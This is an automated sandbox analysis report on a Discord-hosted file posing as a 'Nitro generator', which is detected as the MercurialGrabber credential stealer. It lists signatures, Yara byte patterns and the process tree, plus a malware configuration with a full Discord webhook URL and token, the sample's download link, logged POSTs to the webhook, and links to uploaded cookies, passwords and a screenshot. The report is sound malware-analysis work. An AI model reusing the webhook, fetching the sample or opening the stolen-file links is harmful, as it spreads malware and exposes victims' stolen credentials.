Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe

Overview

General Information

Sample URL:https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe
Analysis ID:517177
Infos:

Most interesting Screenshot:

Detection

MercurialGrabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected MercurialGrabber
Antivirus detection for dropped file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
PE file contains strange resources
Drops PE files
Contains capabilities to detect virtual machines
Uses Microsoft's Enhanced Cryptographic Provider
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6988 cmdline: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" > cmdline.out 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • wget.exe (PID: 7096 cmdline: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" MD5: 3DADB6E2ECE9C4B3E1E322E617658B60)
  • NitroGenV0.5.exe (PID: 6784 cmdline: "C:\Users\user\Desktop\download\NitroGenV0.5.exe" MD5: B4A34AC1A572E23168B2C6803780FE7E)
    • conhost.exe (PID: 3940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • NitroGenV0.5.exe (PID: 7100 cmdline: "C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe" MD5: B4A34AC1A572E23168B2C6803780FE7E)
    • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: MercurialGrabber

{"Webhook Url": "https://discord.com/api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Desktop\download\NitroGenV0.5.exeJoeSecurity_MercurialGrabberYara detected MercurialGrabberJoe Security
    C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeJoeSecurity_MercurialGrabberYara detected MercurialGrabberJoe Security
      C:\Users\user\Desktop\download\NitroGenV0.5.exeMAL_Luna_Stealer_Apr_2021_1Detect Luna stealer (also Mercurial Grabber)Arkbird_SOLG
      • 0xb20:$s1: 73 40 00 00 0A 0B 07 72 B2 0C 00 70 02 7B 07 00 00 04 28 13 00 00 0A 6F 41 00 00 0A 0C 08 6F 42 00 00 0A 6F 43 00 00 0A 6F 44 00 00 0A 0D 09 6F 45 00 00 0A 0A 02 72 E4 0C 00 70 06 28 2F 00 00 ...
      • 0x1d4c:$s2: 72 FD 18 00 70 02 7B 36 00 00 04 28 2F 00 00 06 0A 02 72 0F 19 00 70 02 7B 36 00 00 04 28 2F 00 00 06 7D 38 00 00 04 72 15 19 00 70 02 7B 36 00 00 04 28 2F 00 00 06 0B 02 06 72 31 19 00 70 07 ...
      • 0x7c4c:$x1: ---------------- mercurial grabber ----------------
      • 0x7e94:$x2: 5C 00 73 00 2A 00 3A 00 5C 00 73 00 2A 00 28 00 22 00 28 00 3F 00 3A 00 5C 00 5C 00 22 00 7C 00 5B 00 5E 00 22 00 5D 00 29 00 2A 00 3F
      • 0x80ae:$x3: 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 32 00 34 00 7D 00 5C 00 2E 00 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 36 00 7D 00 5C 00 2E 00 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 32 00 37 00 7D 00 01 1D 6D 00 ...
      C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeMAL_Luna_Stealer_Apr_2021_1Detect Luna stealer (also Mercurial Grabber)Arkbird_SOLG
      • 0xb20:$s1: 73 40 00 00 0A 0B 07 72 B2 0C 00 70 02 7B 07 00 00 04 28 13 00 00 0A 6F 41 00 00 0A 0C 08 6F 42 00 00 0A 6F 43 00 00 0A 6F 44 00 00 0A 0D 09 6F 45 00 00 0A 0A 02 72 E4 0C 00 70 06 28 2F 00 00 ...
      • 0x1d4c:$s2: 72 FD 18 00 70 02 7B 36 00 00 04 28 2F 00 00 06 0A 02 72 0F 19 00 70 02 7B 36 00 00 04 28 2F 00 00 06 7D 38 00 00 04 72 15 19 00 70 02 7B 36 00 00 04 28 2F 00 00 06 0B 02 06 72 31 19 00 70 07 ...
      • 0x7c4c:$x1: ---------------- mercurial grabber ----------------
      • 0x7e94:$x2: 5C 00 73 00 2A 00 3A 00 5C 00 73 00 2A 00 28 00 22 00 28 00 3F 00 3A 00 5C 00 5C 00 22 00 7C 00 5B 00 5E 00 22 00 5D 00 29 00 2A 00 3F
      • 0x80ae:$x3: 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 32 00 34 00 7D 00 5C 00 2E 00 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 36 00 7D 00 5C 00 2E 00 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 32 00 37 00 7D 00 01 1D 6D 00 ...

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmpJoeSecurity_MercurialGrabberYara detected MercurialGrabberJoe Security
        00000006.00000000.280072477.00000000008E2000.00000002.00020000.sdmpJoeSecurity_MercurialGrabberYara detected MercurialGrabberJoe Security
          00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmpJoeSecurity_MercurialGrabberYara detected MercurialGrabberJoe Security
            00000011.00000000.324764469.0000000000512000.00000002.00020000.sdmpJoeSecurity_MercurialGrabberYara detected MercurialGrabberJoe Security
              Process Memory Space: NitroGenV0.5.exe PID: 6784JoeSecurity_MercurialGrabberYara detected MercurialGrabberJoe Security
                Click to see the 1 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                6.2.NitroGenV0.5.exe.8e0000.0.unpackJoeSecurity_MercurialGrabberYara detected MercurialGrabberJoe Security
                  17.0.NitroGenV0.5.exe.510000.0.unpackJoeSecurity_MercurialGrabberYara detected MercurialGrabberJoe Security
                    6.0.NitroGenV0.5.exe.8e0000.0.unpackJoeSecurity_MercurialGrabberYara detected MercurialGrabberJoe Security
                      6.2.NitroGenV0.5.exe.8e0000.0.unpackMAL_Luna_Stealer_Apr_2021_1Detect Luna stealer (also Mercurial Grabber)Arkbird_SOLG
                      • 0xb20:$s1: 73 40 00 00 0A 0B 07 72 B2 0C 00 70 02 7B 07 00 00 04 28 13 00 00 0A 6F 41 00 00 0A 0C 08 6F 42 00 00 0A 6F 43 00 00 0A 6F 44 00 00 0A 0D 09 6F 45 00 00 0A 0A 02 72 E4 0C 00 70 06 28 2F 00 00 ...
                      • 0x1d4c:$s2: 72 FD 18 00 70 02 7B 36 00 00 04 28 2F 00 00 06 0A 02 72 0F 19 00 70 02 7B 36 00 00 04 28 2F 00 00 06 7D 38 00 00 04 72 15 19 00 70 02 7B 36 00 00 04 28 2F 00 00 06 0B 02 06 72 31 19 00 70 07 ...
                      • 0x7c4c:$x1: ---------------- mercurial grabber ----------------
                      • 0x7e94:$x2: 5C 00 73 00 2A 00 3A 00 5C 00 73 00 2A 00 28 00 22 00 28 00 3F 00 3A 00 5C 00 5C 00 22 00 7C 00 5B 00 5E 00 22 00 5D 00 29 00 2A 00 3F
                      • 0x80ae:$x3: 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 32 00 34 00 7D 00 5C 00 2E 00 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 36 00 7D 00 5C 00 2E 00 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 32 00 37 00 7D 00 01 1D 6D 00 ...
                      17.2.NitroGenV0.5.exe.510000.0.unpackJoeSecurity_MercurialGrabberYara detected MercurialGrabberJoe Security
                        Click to see the 3 entries

                        Sigma Overview

                        System Summary:

                        barindex
                        Sigma detected: Windows Suspicious Use Of Web Request in CommandLineShow sources
                        Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" , CommandLine: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wget.exe, NewProcessName: C:\Windows\SysWOW64\wget.exe, OriginalFileName: C:\Windows\SysWOW64\wget.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" > cmdline.out 2>&1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6988, ProcessCommandLine: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" , ProcessId: 7096

                        Jbx Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Found malware configurationShow sources
                        Source: 6.0.NitroGenV0.5.exe.8e0000.0.unpackMalware Configuration Extractor: MercurialGrabber {"Webhook Url": "https://discord.com/api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY"}
                        Yara detected MercurialGrabberShow sources
                        Source: Yara matchFile source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000000.280072477.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000000.324764469.0000000000512000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: NitroGenV0.5.exe PID: 6784, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: NitroGenV0.5.exe PID: 7100, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED
                        Antivirus detection for dropped fileShow sources
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeAvira: detection malicious, Label: HEUR/AGEN.1143801
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeAvira: detection malicious, Label: HEUR/AGEN.1143801
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeCode function: 6_2_00007FFC08BBB20E CryptUnprotectData,6_2_00007FFC08BBB20E
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeCode function: 6_2_00007FFC08BBB241 CryptUnprotectData,6_2_00007FFC08BBB241
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeCode function: 6_2_00007FFC08BBB25E CryptUnprotectData,6_2_00007FFC08BBB25E
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeCode function: 17_2_00007FFC0893AD7A CryptUnprotectData,17_2_00007FFC0893AD7A
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeCode function: 17_2_00007FFC0893B25E CryptUnprotectData,17_2_00007FFC0893B25E

                        Compliance:

                        barindex
                        Detected unpacking (overwrites its own PE header)Show sources
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeUnpacked PE file: 6.2.NitroGenV0.5.exe.8e0000.0.unpack
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeUnpacked PE file: 17.2.NitroGenV0.5.exe.510000.0.unpack
                        Source: unknownHTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49742 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.3:49744 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49755 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.3:49757 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49741 version: TLS 1.2

                        Networking:

                        barindex
                        C2 URLs / IPs found in malware configurationShow sources
                        Source: Malware configuration extractorURLs: https://discord.com/api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ip4.seeip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 448Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 315Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 704Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 307Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 307Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 315Expect: 100-continue
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ip4.seeip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 448Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 315Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 704Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 307Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 307Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 315Expect: 100-continue
                        Source: global trafficHTTP traffic detected: GET //json/84.17.52.68 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET //json/84.17.52.68 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: unknownHTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49742 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.3:49744 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49755 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.3:49757 version: TLS 1.0
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                        Source: NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
                        Source: wget.exe, 00000004.00000003.276308627.0000000002B65000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl
                        Source: wget.exe, 00000004.00000002.276552564.00000000009E8000.00000004.00000020.sdmp, NitroGenV0.5.exe, 00000006.00000002.304401796.000000001BBE5000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.351164827.000000001C910000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: NitroGenV0.5.exe, 00000006.00000002.302856021.0000000002D5C000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350460138.00000000027EC000.00000004.00000001.sdmpString found in binary or memory: http://discord.com
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                        Source: NitroGenV0.5.exe, 00000006.00000002.302789893.0000000002D1D000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350437000.00000000027D9000.00000004.00000001.sdmpString found in binary or memory: http://ip-api.com
                        Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.drString found in binary or memory: http://ip-api.com//json/
                        Source: NitroGenV0.5.exe, 00000006.00000002.302762513.0000000002CF9000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmpString found in binary or memory: http://ip-api.com//json/84.17.52.68
                        Source: NitroGenV0.5.exe, 00000006.00000002.302789893.0000000002D1D000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350381748.00000000027AD000.00000004.00000001.sdmpString found in binary or memory: http://ip-api.comx
                        Source: NitroGenV0.5.exe, 00000006.00000002.302789893.0000000002D1D000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350381748.00000000027AD000.00000004.00000001.sdmpString found in binary or memory: http://ip4.seeip.org
                        Source: NitroGenV0.5.exe, 00000006.00000002.302762513.0000000002CF9000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: wget.exe, wget.exe, 00000004.00000002.276552564.00000000009E8000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/Ni
                        Source: wget.exe, 00000004.00000002.276636961.0000000001075000.00000004.00000040.sdmp, cmdline.out.1.drString found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe
                        Source: wget.exe, 00000004.00000003.276308627.0000000002B65000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe$
                        Source: wget.exe, 00000004.00000002.276632718.0000000001070000.00000004.00000040.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe0
                        Source: wget.exe, 00000004.00000002.276636961.0000000001075000.00000004.00000040.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe9
                        Source: wget.exe, 00000004.00000002.276632718.0000000001070000.00000004.00000040.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe;
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000006.00000002.302988572.0000000002DC5000.00000004.00000001.sdmp, ConDrv.6.drString found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810248877211688/cookies.txt
                        Source: NitroGenV0.5.exe, 00000006.00000002.303106911.0000000002E67000.00000004.00000001.sdmp, ConDrv.6.drString found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810251381211176/passwords.txt
                        Source: NitroGenV0.5.exe, 00000006.00000002.303147034.0000000002EA2000.00000004.00000001.sdmp, ConDrv.6.drString found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810260252164166/Capture.jpg
